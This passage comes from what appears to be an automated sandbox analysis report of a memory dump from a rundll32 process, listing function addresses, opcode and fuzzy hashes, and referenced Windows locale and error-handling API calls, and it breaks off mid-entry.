Opcode Fuzzy Hash: 058ae5f31e7cfff285d16005cee7caa7a80f622fbc20ad0f9d410325722491c2
Instruction Fuzzy Hash: 4EB14D39620705DFE705CF28C496B597BB1FF45368F258A98E89ACF2A5C335E981CB40

Function 7EE2DA10 Relevance: 1.7, Strings: 1, Instructions: 413COMMON

Download Yara Rule

Strings

@, xrefs: 7EE2DAE3

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d7435c65e0fbbf2d8d857476168822fab0720b0b131b0e3d31aab82dfe5f5065
Instruction ID: bcb58ccaf7e9be0c6a0801960d4d636e75a70e2f8d36aee90f48d22a229c4012
Opcode Fuzzy Hash: d7435c65e0fbbf2d8d857476168822fab0720b0b131b0e3d31aab82dfe5f5065
Instruction Fuzzy Hash: EC22CE78D05269CFCB25CF98C990BDDBBB5BF48304F1085AAD849AB355D730AA85CF90

Function 7EE611CC Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 7EE611E2

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 8899ed588fe95f7104ef03b1d71d31a8e9d268d469307170bb70df3d352e3cea
Instruction ID: 58365d1fbe45d6d81c8277c29251843d5685104e0ed05c3c36dce0b0be7e8ced
Opcode Fuzzy Hash: 8899ed588fe95f7104ef03b1d71d31a8e9d268d469307170bb70df3d352e3cea
Instruction Fuzzy Hash: A55173BA951205CFEB06CFA6C8917ADBBF8FB48314F24892ED41AEB350D7759940CB50

Function 7EE6D91B Relevance: 1.6, Strings: 1, Instructions: 388COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 7EE6DAB0

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: a9435dcea718408ad70684dd8ce689b5c8615b9d708e40664c2fe2a53e705a86
Instruction ID: a406274931729164ae34f2a1488fbc98d778adf136683a2a5f71d87545690f8c
Opcode Fuzzy Hash: a9435dcea718408ad70684dd8ce689b5c8615b9d708e40664c2fe2a53e705a86
Instruction Fuzzy Hash: 94E101786A460A8FC725EF28C090AAEB7F2FF45318B904E4DD4579B394D370E961CB11

Function 7EE32420 Relevance: 1.6, Strings: 1, Instructions: 363COMMON

Download Yara Rule

Strings

8jLTyTTW[YL]p]YH, xrefs: 7EE32704

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8jLTyTTW[YL]p]YH
API String ID: 0-613104928
Opcode ID: 580497cab92990d39e97eada57138bcd39ffc78c8f3bd34b3b4195888a899f16
Instruction ID: 7a24b207ad5716611359390ec4f89b8f1df8965a4f902e0cef72619007063b78
Opcode Fuzzy Hash: 580497cab92990d39e97eada57138bcd39ffc78c8f3bd34b3b4195888a899f16
Instruction Fuzzy Hash: 4812BE78E04269CFDB15CF99C890BDDBBB2BF49304F20819AD859AB345D730AA85CF50

Function 7EE7A953 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 7EE71EEC: GetLastError.KERNEL32(?,00000008,7EE7699C), ref: 7EE71EF0
Part of subcall function 7EE71EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EE71F92

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EE7A9A7

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: df9a7b3e003c089a901ca6c8094334c48943d1190ab8b8f14fe9795ff8286f6a
Instruction ID: 6793ea6b86763298965422cb8fa609eaa97921eb049d4739f58d76d210e7ff3b
Opcode Fuzzy Hash: df9a7b3e003c089a901ca6c8094334c48943d1190ab8b8f14fe9795ff8286f6a
Instruction Fuzzy Hash: E621D73A526206ABDB19CF25DD41AAB73BCEF04315B10487AED06D6144EB34DD40CB50

Function 7EE6D5B6 Relevance: 1.6, Strings: 1, Instructions: 322COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 7EE6D74E

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e3f01198032b882bf23b008286447b125d4775881d476960e68901683535556a
Instruction ID: 8ae385914f31232a04ab61b07a1cbabad51fc230b414abfcee46f8a7ad95dfd9
Opcode Fuzzy Hash: e3f01198032b882bf23b008286447b125d4775881d476960e68901683535556a
Instruction Fuzzy Hash: 86B1363CA9060A8FCB11EF94C990AAEB7F1FF44208F904D1DC45BE7294D731A922CB51

Function 7EE6CEE0 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

0, xrefs: 7EE6D06A

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 7b83e52efd77630389fd4a50da9535a1cf25cfeb435105dc10dc718e461658bc
Instruction ID: 19d00e1a883c6d8410fc16f986e90d5d658e88bc485c317d491ebb5308da1723
Opcode Fuzzy Hash: 7b83e52efd77630389fd4a50da9535a1cf25cfeb435105dc10dc718e461658bc
Instruction Fuzzy Hash: ECB124789A464B8BCF11DF64C5A0BAEB7F6AF04208F504E1ED853D7294C731DA92CB41

Function 7EE7A5DA Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 7EE71EEC: GetLastError.KERNEL32(?,00000008,7EE7699C), ref: 7EE71EF0
Part of subcall function 7EE71EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EE71F92

EnumSystemLocalesW.KERNEL32(7EE7A700,00000001,00000000,?,-00000050,?,7EE7AD31,00000000,?,?,?,00000055,?), ref: 7EE7A64C

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: b89cabfd69cc35a297435d7bd18ec213257245a9d8c1de789793a33555fa4966
Instruction ID: 54a1519f36eeffefc3c143db64fc0c5063e653c63cef099708c1fee1056d60ac
Opcode Fuzzy Hash: b89cabfd69cc35a297435d7bd18ec213257245a9d8c1de789793a33555fa4966
Instruction Fuzzy Hash: A411E93F2287015FDB189F79D89057AB7A2FF84368B15492CD98B87A40D7757943CB40

Function 7EE7AB82 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 7EE71EEC: GetLastError.KERNEL32(?,00000008,7EE7699C), ref: 7EE71EF0
Part of subcall function 7EE71EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EE71F92

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,7EE7A91C,00000000,00000000,?), ref: 7EE7ABAE

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: ba7e051245871992f89a7952a7e06a7cf5303f80c090b53f762f0594943a0b2d
Instruction ID: 507de0aad1b836a341339ef7b0e3a9af80f9cf234353fa295821e54efb33ffba
Opcode Fuzzy Hash: ba7e051245871992f89a7952a7e06a7cf5303f80c090b53f762f0594943a0b2d
Instruction Fuzzy Hash: 6CF0A93E618113AFDB145A61CC55BBA7B7DEB40698F114C29DC0BA3140FA74FD41C690

Function 7EE7A675 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 7EE71EEC: GetLastError.KERNEL32(?,00000008,7EE7699C), ref: 7EE71EF0
Part of subcall function 7EE71EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EE71F92

EnumSystemLocalesW.KERNEL32(7EE7A953,00000001,00000001,?,-00000050,?,7EE7ACF5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 7EE7A6BF

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: cad9500bf2e3027fee9bd208b28eb51f3f01c9b7f3965ab976e5a22523ef01b7
Instruction ID: 6a97f8e974ea3aed37f3a1a8eee751efa339faa10e7505998a8e72f6059bf00a
Opcode Fuzzy Hash: cad9500bf2e3027fee9bd208b28eb51f3f01c9b7f3965ab976e5a22523ef01b7
Instruction Fuzzy Hash: A8F0F63A2183045FD7149FB5A895A6A7BA5EF8036CB164C2CE94E8B680D671AC41D750

Function 7EE73E2F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 7EE6F430: EnterCriticalSection.KERNEL32(-7F165678,?,7EE70E1E,?,7EE96558,0000000C,7EE71108,7EE852A0), ref: 7EE6F43F

EnumSystemLocalesW.KERNEL32(7EE73E22,00000001,7EE96698,0000000C,7EE742AA,00000000), ref: 7EE73E67

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 9afaafc21fdd587e4f23db29e86c4233856921d5a74f0401589301d59f78bb72
Instruction ID: 60fc3e015267a3b00700d8dd76f1e7cd9811fee083918cd3650042c34b0961ac
Opcode Fuzzy Hash: 9afaafc21fdd587e4f23db29e86c4233856921d5a74f0401589301d59f78bb72
Instruction Fuzzy Hash: 43F0327AA062049FDB10DF99D840B9D77E4FB48375F204A2AE812DB290CB7559008F81

Function 7EE7A58F Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 7EE71EEC: GetLastError.KERNEL32(?,00000008,7EE7699C), ref: 7EE71EF0
Part of subcall function 7EE71EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EE71F92

EnumSystemLocalesW.KERNEL32(7EE7A4E8,00000001,00000001,?,?,7EE7AD53,-00000050,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7EE7A5C6

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 32bad32c8976947c05e580afbf07cd2feec6979c41a06f02dded2756f5ddc7c0
Instruction ID: 0ecdc837bff6e74da0bd93f9a6b96f18e303dbdfaf95880c7431dc97ccede487
Opcode Fuzzy Hash: 32bad32c8976947c05e580afbf07cd2feec6979c41a06f02dded2756f5ddc7c0
Instruction Fuzzy Hash: 6AF02B3E3202055BDB05DF75D845B6A7FA5EFC1764B064858EE0ACB640D772D883C750

Function 7EE743AE Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7EE73498,?,20001004,00000000,00000002,?,?,7EE72A9A), ref: 7EE743E2

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: f23ae99b581a6357453fb074485cc7ab0e4f7da85403a28295fb2a52f05fc6ad
Instruction ID: 0a2f84e75d19cf21eea4e7c74a16eb498b50e3389010b56a59f06d6ff9dddae6
Opcode Fuzzy Hash: f23ae99b581a6357453fb074485cc7ab0e4f7da85403a28295fb2a52f05fc6ad
Instruction Fuzzy Hash: B4E04F3A54522DBBCF122F61DC04AAE3E29EF44751F014C21FD0566210CB718D219B94

Function 7EE2D6C0 Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

~, xrefs: 7EE2D7CF

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-3435094601
Opcode ID: f473526179b14dc7b54010718b3b35f16106141adc3722302304098281a09c73
Instruction ID: 0e7dd8c9720904875b3a319cea40faea266870ecf780e275be76dc1971520d3d
Opcode Fuzzy Hash: f473526179b14dc7b54010718b3b35f16106141adc3722302304098281a09c73
Instruction Fuzzy Hash: BCB1E178D04259DFCB14CF98C890BEEBBB5BF49314F1086A9D859AB385D7306A85CF90

Function 7EE2D370 Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

~, xrefs: 7EE2D47F

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-2946903494
Opcode ID: 87ed2dd50521041696b0e9db627553d44a870074a3c691c792a1947abaa3acb1
Instruction ID: 64deab41cbd6995553e8ae4f00b8445491e95c33b018a0a00e4e05c4b6d38690
Opcode Fuzzy Hash: 87ed2dd50521041696b0e9db627553d44a870074a3c691c792a1947abaa3acb1
Instruction Fuzzy Hash: F2B1E2B8D04659DFCB14CFA8C890BEDBBB5BF49304F1086A9D859AB345D7306A85CF90

Function 7EE4AF60 Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

N/A, xrefs: 7EE4B17E, 7EE4B1D1

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: __aullrem
String ID: N/A
API String ID: 3758378126-2525114547
Opcode ID: 98545495347844067bce575b1cf00fed2c8d953710b3e69bc8500137cd82a91a
Instruction ID: c0c94d5c35dc09e217b53301d2fff8d2aa1eee7394848bf609d79f8378a72d59
Opcode Fuzzy Hash: 98545495347844067bce575b1cf00fed2c8d953710b3e69bc8500137cd82a91a
Instruction Fuzzy Hash: 42B1E478E04258DFCB14CF99D890AEDFBB1BF89304F248599E859A7345D730AA85CF50

Function 7EE4E3A0 Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

N/A, xrefs: 7EE4E5BE, 7EE4E611

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: __aullrem
String ID: N/A
API String ID: 3758378126-2525114547
Opcode ID: 56404a3598f3b42f444447bcb8e61305338c8132d31fedc2ca48fe50a81fd9cf
Instruction ID: ab414ebdd8e5c5433cd2f209a5d3f14e47e0409c181e420f04e816a2087d53fd
Opcode Fuzzy Hash: 56404a3598f3b42f444447bcb8e61305338c8132d31fedc2ca48fe50a81fd9cf
Instruction Fuzzy Hash: E6B1E278E04258DFCB14CF98D890AEDFBB2BF89304F248599E849AB355D734AA41CF50

Function 7EE45EC0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

,z~, xrefs: 7EE45EE8

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,z~
API String ID: 0-3557226509
Opcode ID: 62509378abaa459587042215145ccaa329c69774e4d554f83ed17055aacb7123
Instruction ID: c8d11ab4f8ec2f678b65244ac93bd130224b20dc022b3e8285eba1393230d71c
Opcode Fuzzy Hash: 62509378abaa459587042215145ccaa329c69774e4d554f83ed17055aacb7123
Instruction Fuzzy Hash: 4E61B0B8E04259DFCB04CF99C490AEDFBB1BF49304F20815AE815AB345D731AA46CF90

Function 7EE24280 Relevance: .8, Instructions: 827COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
Instruction ID: a42ae758925c993e58a5c92dfeac0cb8718340eaad0781c661f95c988c10aea3
Opcode Fuzzy Hash: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
Instruction Fuzzy Hash: 12A29B78E056698FDB69CF59C990BDDBBB2BF49304F1081EAD849A7345D730AA81CF40

Function 7EE6D228 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6726523db7dea20f24656f3c9d4f78b02e30256ec464f25f94559e24c3b499f
Instruction ID: cd3bd73b1b95f27495f630d31f4e1aa76f7f0bf07c722789e2f6b306e98b0d21
Opcode Fuzzy Hash: e6726523db7dea20f24656f3c9d4f78b02e30256ec464f25f94559e24c3b499f
Instruction Fuzzy Hash: 5CC1F1789946068FCB16EF64C4906AEBBB6FF45218F904E1DC853DB7A0C730E965CB81

Function 7EE247D4 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
Instruction ID: 95bd11ce31aa8c87b0d16da499e47fe76c39016f1b83788cf740832b73a82d00
Opcode Fuzzy Hash: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
Instruction Fuzzy Hash: 65127E78E05269CFDB64CF58C994B9DB7B2BF89304F2081E9D809AB345D730AA81CF50

Function 7EE5AAF0 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: add8a23739b7b53e24ebff533506f9a7d62a377ad97ca8564ca037c9842dbe05
Instruction ID: b7987250d5b1466eff46b7cb5a5335741e967da3589639cbe2f473b8a6888d86
Opcode Fuzzy Hash: add8a23739b7b53e24ebff533506f9a7d62a377ad97ca8564ca037c9842dbe05
Instruction Fuzzy Hash: C4D1E974A10209DFCB49CF59C891A9DBBF2FF89318F14C599E81AAB355D731A981CF80

Function 7EE242E4 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f3193ded926ed4420defb500cfa97874007a13f02a14ad6cbc4be5a94fad96a
Instruction ID: d16b7da367ff45c7b761428c1070c52cf35e69d01cf01813cb5ac0c064187cd2
Opcode Fuzzy Hash: 6f3193ded926ed4420defb500cfa97874007a13f02a14ad6cbc4be5a94fad96a
Instruction Fuzzy Hash: D6D17C78E04268CFCB64CF59C990BDDBBB1BF88305F1481EAD859A7355DA30AA85CF50

Function 7EE2E250 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289e492c3642ff6df3a6302c21a1996295793981a35792e4212951d7e04a6536
Instruction ID: ef8a05f0edb57257c85d5181b17234dc82335d8a834760f2e0d13e40119a88b5
Opcode Fuzzy Hash: 289e492c3642ff6df3a6302c21a1996295793981a35792e4212951d7e04a6536
Instruction Fuzzy Hash: 0DB1F278D04269DFCB15CFA8C890BEDBBB5BF49304F1086A9D819AB355D7306A85CF90

Function 7EE26E80 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
Instruction ID: 0c8bb1393caea4ee33db33045e9b34a0cb7b89ebd63f6e4f1968e931101d3e71
Opcode Fuzzy Hash: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
Instruction Fuzzy Hash: 3CB1B478E10219DFCB14CF99C590AADFBB2FF48305F2081A9E859AB355D730AA85CF54

Function 7EE272D0 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b601761bc5d2624fd853a6960e9995ef5c5ac94509317b201845ad4e9e0b0213
Instruction ID: 44bf0fd16e0110e1fee4e54794e6d4f31af1493a8af95ddc99904ac1109a675c
Opcode Fuzzy Hash: b601761bc5d2624fd853a6960e9995ef5c5ac94509317b201845ad4e9e0b0213
Instruction Fuzzy Hash: DB91A0B8E05219DFCB08CF99C490AADFBB6FF48305F2481A9D815AB345D734A941CF90

Function 7EE35CD0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7894568d44e382275c7355847ad892dfa58d296d52f6d85062c2a1476f1e2588
Instruction ID: 8c243c1b95ed9f13bb0d4d3bfeeff2172955c46f6d1d301db2cbd2c294cc057f
Opcode Fuzzy Hash: 7894568d44e382275c7355847ad892dfa58d296d52f6d85062c2a1476f1e2588
Instruction Fuzzy Hash: FA81A0B8E05249DFCB05CFA9C490AEEFBB2BF48304F24855AD815AB345D735A946CF90

Function 7EE664ED Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a4520f36a809a18397db0f2ab063229439142230a76a1cf20750397584d6650
Instruction ID: 90a39c2cf4683c896fb765bd3543880311c6ab9efa421861f2a7136811bdfa4a
Opcode Fuzzy Hash: 6a4520f36a809a18397db0f2ab063229439142230a76a1cf20750397584d6650
Instruction Fuzzy Hash: 0A518475E1011AEFDF05CF99C951AAEBBB6FF88304F15885DE805AB205D734AE50CB90

Function 7EE26C70 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
Instruction ID: 36ceb1e30015ea1f4d586f67fda3a95d53f107a1da251c4ee7f7322427141536
Opcode Fuzzy Hash: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
Instruction Fuzzy Hash: D9818FB8E04259DFCB04CF99C590AEDFBB1BF48304F20816AD855AB355D734AA85CF94

Function 7EE26F1A Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
Instruction ID: 623e9e2a715be21d6323d4d46cf4a32833ef35ee97231a679206e2c2bbfd380f
Opcode Fuzzy Hash: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
Instruction Fuzzy Hash: 87719078E14219CBCB18CF99C490AEDFBB2BF48315F2481A9E859A7355D734AA81CF50

Function 7EE32A20 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a81ac5fefb6689b28e7d3d515c49c4fbaa181e5f075f0e7c0c759a794e5351dc
Instruction ID: 9650ed7807357d996046ab3ad910d53f9cde919b68eed6ea15d2ddb8ad6f0eff
Opcode Fuzzy Hash: a81ac5fefb6689b28e7d3d515c49c4fbaa181e5f075f0e7c0c759a794e5351dc
Instruction Fuzzy Hash: A3619DB8E04259DFCB18CF99C590AADFBB2FF88304F24855AD855AB355D730AA41CF90

Function 7EE61EE0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 186d9f48ce9fa8bfba29019b618f0da36f09424f7f32f4f1f229713199ce206b
